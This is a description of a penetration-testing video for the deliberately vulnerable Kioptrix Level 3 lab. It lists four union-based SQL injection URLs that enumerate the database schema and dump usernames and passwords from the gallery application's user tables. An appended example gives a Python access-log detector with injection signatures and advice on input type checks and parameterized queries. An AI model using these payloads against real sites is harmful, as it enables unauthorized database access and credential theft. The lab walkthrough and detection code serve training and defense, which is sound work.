Description: In this video I will show you how to exploit the Kioptrix Level 3 web application using SQL injection.
Kioptrix is a vulnerable web application for penetration testing.
In this demo I will cover how to exploit a web application using SQL injection and find the web admin password.
http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6
http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name="dev_accounts"),4,5,6
http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(id, 0x3A, username, 0x3A, password, 0x0A) from dev_accounts),4,5,6
http://192.168.0.187/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(userid, 0x3A, username, 0x3A, password, 0x3A, usertype, 0x3A, firstname, 0x3A, lastname, 0x3A, email, 0x3A, website, 0x3A, issuperuser, 0x3A, joincode) from gallarific_users),4,5,6
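Seen from the defender's side, the requests above stand out in a web server access log. The following is an added example, not part of the original video or its source notes: a small Python detector that flags them. The log format (Apache common log format), the client addresses, the timestamps and the rule that a gallery id is a plain non-negative integer are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (assumed Apache common log format). The request
# targets reuse the gallery.php?id= requests shown above, URL-encoded.
SAMPLE_LOG = """\
192.168.0.50 - - [10/May/2011:10:00:01 +0000] "GET /gallery/gallery.php?id=1 HTTP/1.1" 200 3120
192.168.0.50 - - [10/May/2011:10:00:09 +0000] "GET /gallery/gallery.php?id=null%20and%201=2%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),4,5,6 HTTP/1.1" 200 3544
192.168.0.50 - - [10/May/2011:10:00:20 +0000] "GET /gallery/gallery.php?id=null+and+1=2+union+select+1,2,(select+group_concat(id,0x3A,username,0x3A,password,0x0A)+from+dev_accounts),4,5,6 HTTP/1.1" 200 3391
192.168.0.51 - - [10/May/2011:10:01:02 +0000] "GET /gallery/gallery.php?id=7 HTTP/1.1" 200 2987
"""

LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" \d{3}')

# Patterns taken from the structure of the requests on this page.
SIGNATURES = {
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema-enum": re.compile(r"\binformation_schema\b"),
    "group-concat": re.compile(r"\bgroup_concat\s*\("),
}

def findings(log_text, param="id"):
    """Return (client_ip, [reasons]) for each request whose `param` looks injected."""
    out = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        # parse_qs URL-decodes the value and turns '+' into a space.
        for value in parse_qs(urlsplit(m["target"]).query).get(param, []):
            reasons = []
            if not value.isdigit():  # assumption: a valid gallery id is an integer
                reasons.append("non-integer-id")
            normalized = re.sub(r"\s+", " ", value.lower())
            reasons += [n for n, rx in SIGNATURES.items() if rx.search(normalized)]
            if reasons:
                out.append((m["ip"], reasons))
    return out

if __name__ == "__main__":
    for ip, reasons in findings(SAMPLE_LOG):
        print(ip, ",".join(reasons))
```

The type check on id is the stronger signal, since it does not depend on any keyword list; the same check applied in the application before the query is built, together with a parameterized query, removes the injection point.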
Source: http://lanmaster53.com/2011/05/kioptrix-level-3-notes-spoiler-alert/
Tags: sql-injection, hacking, hack